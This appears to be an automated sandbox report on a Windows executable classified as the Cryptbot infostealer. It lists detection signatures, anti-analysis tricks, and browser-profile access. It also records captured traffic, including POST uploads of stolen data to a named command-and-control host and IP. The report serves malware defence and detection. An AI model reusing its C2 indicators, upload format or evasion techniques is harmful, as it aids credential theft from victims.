Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561480
MD5: 8009fa9b3f6b5b95575a83c2f487f515
SHA1: df618866e5939f420342d3fe1007f4bad31ce2aa
SHA256: 72f200b10e86e1a4c4f1472fca830fa83bb45115ac60a17a70617863367fa9bf
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_006015B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0D14B0
Source: file.exe, 00000000.00000003.1693174364.00000000076A2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_7519ee52-3
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_006081E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0F0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1AF960h 8_2_6C0EEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0F4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1784A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C0FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C170730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C12A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C0F0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1AD014h] 8_2_6C1A4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C147D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C143840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C0FD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C14B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C0FD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C149600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C0FD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1ADFF4h 8_2_6C143690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C0FD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C173140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0EB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C167350
Source: chrome.exe Memory has grown: Private usage: 14MB later: 25MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49737 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49749 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 34.116.198.130:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 459Content-Type: multipart/form-data; boundary=------------------------ONK2fRoVUIiQdRQ0OJoamyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4f 4e 4b 32 66 52 6f 56 55 49 69 51 64 52 51 30 4f 4a 6f 61 6d 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 61 6a 69 77 6f 6d 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a c5 fa 20 44 0b ce da c5 5d 83 88 be 5f da 38 26 8a 55 b4 e9 d8 47 ad e1 b7 0e 36 5f 79 99 6b 60 ab 2b 24 ee 98 cb 11 b5 ce 3e 21 ce a1 ff 17 58 47 1e f7 e5 7e 3e e3 ec e5 67 1c 65 1d 88 48 9c 9a 61 4d 55 4e 7c 9c b6 af 36 6c f1 5f 8b e0 9b dd 76 f8 46 e5 1f d6 4f b7 48 98 6e 9f e9 24 db 5e 40 f0 a4 69 80 29 bd 90 38 b5 4c 5a c6 63 cb 87 09 e7 82 64 f3 12 31 22 53 95 d4 37 8c 34 77 cd ae 7a 78 ce e0 7e 31 5e d2 88 b0 7b 58 69 3e a4 20 ca 6c ad 67 3b 30 54 d1 b0 2d 20 7a 86 de ab 20 c1 58 d9 47 41 89 35 4a 58 9c 73 6a e8 1f ca b9 23 88 bf 7e e8 d9 b6 be d9 cf 37 cd 55 38 1e ce 62 33 3d 87 0c 86 48 1a e0 12 04 8b 85 20 ce 33 d1 d1 9d 9e 5a 77 16 c6 72 ba 80 68 a6 00 35 a1 52 76 d7 c0 9f 56 9c e9 13 4b 9f 91 bd 4a 81 34 20 71 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4f 4e 4b 32 66 52 6f 56 55 49 69 51 64 52 51 30 4f 4a 6f 61 6d 79 2d 2d 0d 0a Data Ascii: --------------------------ONK2fRoVUIiQdRQ0OJoamyContent-Disposition: form-data; name="file"; filename="Fajiwom.bin"Content-Type: application/octet-stream D]_8&UG6_yk`+$>!XG~>geHaMUN|6l_vFOHn$^@i)8LZcd1"S74wzx~1^{Xi> lg;0T- z XGA5JXsj#~7U8b3=H 3Zwrh5RvVKJ4 q--------------------------ONK2fRoVUIiQdRQ0OJoamy--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 75887Content-Type: multipart/form-data; boundary=------------------------bBx6IZDHm36jJEFSEEpcZDData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 42 78 36 49 5a 44 48 6d 33 36 6a 4a 45 46 53 45 45 70 63 5a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 6f 74 6f 6d 75 71 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 02 94 14 a0 78 69 e0 7e 33 45 70 af ee d7 6c 3c 7d 31 61 58 ce 73 2f d7 2b 28 ed 85 e9 d8 49 65 e0 e2 16 fd 99 81 5d 79 6a 2a b1 6f 9c fb b8 22 60 3f fd 58 30 89 1e ba 3b 54 17 48 26 7e 06 fd 14 ee 0d bf 68 6a 30 ab 1a 9d b9 29 ed 5b cc 87 94 23 78 79 23 cf d1 f1 9a 1c 98 aa 74 ac fd a8 38 c6 c9 87 91 1d 97 e1 5b 67 71 cb 61 ea 0d 34 3c ad ed 17 cb ac 7c de be f7 7e d3 13 39 b3 db a2 fd ba c3 2d b9 93 33 d5 93 3f f8 5e 58 3c 4d f2 71 60 f2 ce d9 c3 e8 a6 35 29 90 19 26 38 1e 59 65 89 d8 f7 56 87 58 d3 b3 4b 79 bf 48 a3 43 6a c9 72 7f 40 e0 a0 ee 22 17 78 69 97 19 ca f9 d5 4a fa 0f 27 39 95 49 7b e2 0c 03 6e e0 01 ab 75 a3 70 10 1b 5d 62 8f 96 25 d5 4b 54 eb 99 dc 12 69 5d 95 66 cd e8 64 54 ae 77 38 43 6e 7e 2b c3 75 ee e8 10 d4 af 85 4a 94 74 b5 11 b1 79 6c 1c 0a 03 60 f4 5d 02 51 f7 98 d9 e2 a6 a3 eb 23 3f e9 26 58 a1 58 2d df de 2d 7c 4d 82 56 7b bf f9 4d c4 10 81 25 2f 78 19 28 f2 a2 03 71 ea cd c2 57 18 8d 62 fb 76 de ce 4a cc f9 6b dc 4d 62 94 9d b4 bc 1e 8a 87 5f 64 5c 83 32 c8 49 12 3a 53 56 f5 a7 b2 fa 63 fc e6 70 a2 cd 78 12 c6 a1 cd a4 fe d5 09 52 bc aa 16 9b 56 e6 4e dd d7 67 be e1 d7 a9 15 08 aa f6 04 e7 16 7e 73 03 1d 9f f4 01 71 fd 98 ee 48 d0 0b 7f a5 26 68 85 c5 fd ce b4 92 19 d3 bb fd 67 42 7b eb b3 b4 a0 64 b9 03 d0 fa eb c5 6d 56 a5 a9 20 29 56 83 4e f2 b8 38 01 d8 65 02 bc 28 f8 8d 0e 78 52 85 fc 53 db 07 96 43 3e fb 7b 7b 90 ad 6a 0c 15 53 c0 33 39 36 70 9a 3c 2f 62 fc 81 13 8f 30 90 9b 44 87 24 3a fb 29 1d 82 4f a9 7a e3 76 74 a9 64 47 50 42 fa e5 4d 58 bb 30 02 51 09 51 58 89 8d b0 9b fc dd c7 6b 5d 91 97 5d be 23 62 82 4d b9 71 73 bc 85 c2 40 17 ec 9d 9b 10 f2 c7 81 a1 34 7d d9 b9 6c da 87 ca 72 1e d6 cd e8 70 34 50 e9 8e ba 43 c4 4d 8a 68 74 19 3f fd 5e d9 7e fa 15 9b 77 07 f1 df 58 df 27 53 6e d4 9c a6 62 a4 da 45 85 0a 89 22 35 a5 24 e6 ff e9 c8 c3 cd af 59 ec 28 ad 52 a0 96 a6 a0 9d be d6 5a e3 5d 61 a4 cd ba 98 3a 8d 14 4a 52 df eb bf 0d de d1 29 81 41 9d c1 5b 00 ea 61 32 64 7a b2 52 3c 79 da 44 b7 0e b1 75 64 b8 d7 2e 7a ab 4b 56 cc 49 e9 6f 82 8c 04 2f 3c 0d eb 18 1e 9c a9 62 f9 3c c9 e0 3f a1 a8 90 fb 1e 9a 2b 4d b7 06 bc 70 50 92 ea d9 10 ae 44 88 49 4d a3 fa 7e f9 09 68 f4 31 81 eb c6 6b 0a d5 23 8a b7 07 e8 5f b4 fc 4e ed 3e 30 64 10 41 ec 14 1a d9 ba a6 d7 55 71 e5 e8 6f 6a d0 fc d9 a8 34 1a de 91 a4 89 c7 9c 31 1a f4 90 7a 8a 9b b8 62 d9 3d fe 9f f2
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 30018Content-Type: multipart/form-data; boundary=------------------------78mgyYfZCNsJ07Hf5bxVquData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 38 6d 67 79 59 66 5a 43 4e 73 4a 30 37 48 66 35 62 78 56 71 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 71 6f 66 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a c7 40 52 c6 51 7a bb 53 46 e9 d3 8b 71 f8 12 08 64 c1 f7 b2 59 ab d5 5a 3c f4 ab ba 34 44 f5 af 21 37 56 0f bd 6f 60 28 fe 82 37 78 d5 d2 73 4f e5 45 55 56 12 fd 8f e1 1e 7a 47 f4 85 d2 b1 03 ba 9f c8 54 ff 25 f1 09 8e 84 7c e8 4d 15 80 85 74 76 8d 70 df b1 67 26 82 f7 12 bc 35 50 c8 14 e1 83 a8 28 ca a1 cf 68 bb ca 94 a1 1c d2 bf f8 a5 2b ea ab 6b 1f cb 19 a5 02 94 35 0f ec b4 f8 7c 36 03 3e 35 70 d9 02 22 f7 68 cd f2 43 e9 35 0e cf 84 6e 22 44 ac e6 08 9f 14 9c 02 c7 08 b1 59 a2 7a 7b 63 7d cc a0 c5 3c fd 9a 6f 6a be 98 61 40 87 83 23 1f 45 37 dd e9 03 85 6e 27 84 19 94 87 da 3b 8f be 10 78 1f 68 e3 ac 28 8b 0a ec 6a 93 f6 ee 04 2b 89 e0 c9 06 69 e6 0c 84 1c 74 29 1d 06 87 e7 60 d6 af 03 64 a1 a0 6b 0d fa c1 a7 b9 a0 11 53 da 9e 38 52 8d 86 49 01 29 97 d7 a2 67 70 54 de 15 9f bf 83 61 19 93 2f 61 ba 9f c4 4c a5 f4 45 91 ef 30 d7 13 d9 83 b2 ff dd e7 4c de cc b6 1c 29 07 60 49 55 b7 c5 9a 0c c3 8d 0a cd 5f 01 63 71 33 f2 f4 f7 75 52 38 26 35 ca 12 bd 40 cf f5 68 ae f4 0d 70 6c c2 aa e9 e6 0e 0f ed bd 48 4a 25 f1 a4 17 29 cc 0d 1c bc 57 b2 02 f6 9d 7f b9 df b2 1f ac 19 6b 4f 31 55 e3 05 56 97 ce b7 db 77 80 49 1c eb c9 e0 be ab 67 6c 04 0f 9e 6a 7c 70 d9 5c 35 fa 53 f2 9d 74 3f 52 f7 14 e4 8b 9f d8 aa f3 6e 0b 8b 6f 46 c1 af 8d ad 8d 65 52 8c 93 e0 3d 87 8c b5 17 db 07 39 56 d9 21 30 b6 f7 18 20 4f ff c4 85 74 99 61 ec 83 c2 7b d1 2e ed e8 97 35 86 62 5d 38 62 6d 91 5d 35 1f 1e 59 a3 7c af 93 bb 06 63 a0 05 3a cf 61 fd 38 cd 8b 8a 9c e2 05 93 64 33 16 f0 00 06 1c b6 9f ff 90 0f b3 f2 22 50 2e 93 ce 82 62 6a b9 66 0a 51 37 4f 3f f5 da 3e 91 2e 18 a5 f3 aa d9 8f 78 4b 63 5b ae f8 69 98 e0 7f 57 0f 96 91 77 c5 27 85 c5 e7 e5 b6 74 40 eb 8f 87 c7 f6 25 12 f2 ee 0c f6 9e 4f 6b 82 22 ba e5 9d 73 7f c9 ce 70 d3 bb f9 6c 97 cf 9f 6f a3 0f 76 2a b3 14 b2 81 92 ce 1d b3 20 61 c3 bc 21 a0 c9 4d 59 48 a2 2c 68 0d 74 4b 93 ef f8 ff 33 17 fe 06 04 2d 58 f8 3c 86 94 8f 3e 6f b0 58 aa f2 4d 19 4d 24 06 e0 59 d9 17 4a 8d 99 5c 6f ac 7e 37 59 60 1b 55 01 6c 28 3e 66 9c f3 15 fb 57 39 7f cd 71 05 43 d0 7f f9 4e 10 c3 88 b8 fb 67 49 88 3f cd a2 ab 81 fb dd dd 24 a4 ca 1c 54 42 3e f0 2f 4f f3 4d e1 e9 33 4f 0d 62 21 20 51 30 02 24 b8 14 96 11 c8 84 69 d9 2e 93 9a 47 e8 83 95 22 f8 5c 37 7f 9a 8e 8a d3 79 88 06 01 18 d8 4b cd 1c 6f 0c ce 91 12 6c 15 da 2c 7f f6 25 11 13 be be d6 07 e7 28 d7 06 d0 6e d1 67 38 b5
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2048983908.0000181400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2048800245.0000181400F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040017429.000018140045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000002.2048983908.0000181400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2048800245.0000181400F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040017429.000018140045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px 